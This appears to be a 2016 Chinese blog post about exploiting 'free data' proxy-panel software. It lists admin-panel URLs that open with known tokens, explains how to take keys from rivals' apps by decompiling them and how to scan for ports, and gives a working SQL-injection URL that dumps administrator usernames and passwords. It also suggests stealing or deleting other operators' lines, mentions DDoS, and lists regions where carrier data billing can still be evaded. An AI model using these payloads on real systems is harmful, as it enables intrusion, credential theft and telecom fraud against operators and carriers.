流控漏洞,康师傅免流漏洞,骚逼汪流控漏洞,7k免流漏洞

时间:2016-11-13    作者:晨曦    分类:


汪云端后台:IP+端口/sbwremote/smhoud.php?token=sbwml.cn

7k云端后台:IP+端口/7kyun/smhoud.php?token=填写key

毒药云端后台:IP+端口/duyao/duyao.php?token=填写key

inesadmin云端:IP+端口/linesadmin/admin.php?token=填写key

smhoud云端:IP+端口/smhoud/smhoud.php?token=填写key

康师傅云端:IP+端口/linesadmin/admin.php?token=填写key

key获取方法:

1.软件获取

2.他免流APP获取(反编译APP,在classses.dex中搜索htpp 就能查询到他的KEY)

如果获取不到KEY建议试试开头的破解代码,或者去他APP里面获取!
↓↓↓↓
上面1,软件获取,我也不知这么获取,,毕竟搬砖来的,

2,编译app 可以用mt管理器。 

3,怎么找端口,直接扫IP,端口开着的一般就几个。

代码应该是能使用的。上次的sbw 就可以。

这个有啥用那,我想到两个,欢迎补充哈,

1,可以找现成的冕旒配置,

2,把线路配置里面的冕旒代码稍稍的修改一两个,变成不免的

看版本还可用代码http://服务器IP/sbwremote/smhoud.php?token=sbwml.cn 


http://服务器IP:8888/sbwremote/smhoud.php?token=sbwml.cn


直接删除线路偷线路都行软件的app的地址都可以修改

adminer 可注入式后台 PHP admin页面有SQL注入

漏洞详情:http://ip:端口/linesadmin/api.php?c=user&a=find&device_ids=1) or和谐 1 uni和谐on all sele和谐ct username,password,3,4,5,6,7,8,9,0 from admin%23

这个可以获取到管理员账号密码,稍做修改可以获取数据库中的所有数据

修复方法,把linesadmin修复.zip解压替换到linesadmin文件夹中

个人的能力有限,这个方法,可以抵御一些小白的攻击

今天在QQ群里面见人家讨论了好久这个玩意儿,


最后我总结了一下现在还能免流的地区有:


四川 成都 广西 云南 上海 山西

贵州 山东 广东 江西 海南 湖北

浙江 湖南 天津 黑龙江 重庆 河北

福建 甘肃 河南 安徽 陕西


至于其他的地区未测试,不在上述地区之列的小伙伴可以自己试着能不能免流。

最后,上述地区确实能免流,但是具有时效性,不代表100%有效!


免流地区只针对于现在流行的UDP免流方式,通常端口有137/138

ddos最直接..你懂的

更多漏洞 敬请待关注更新2016/11/13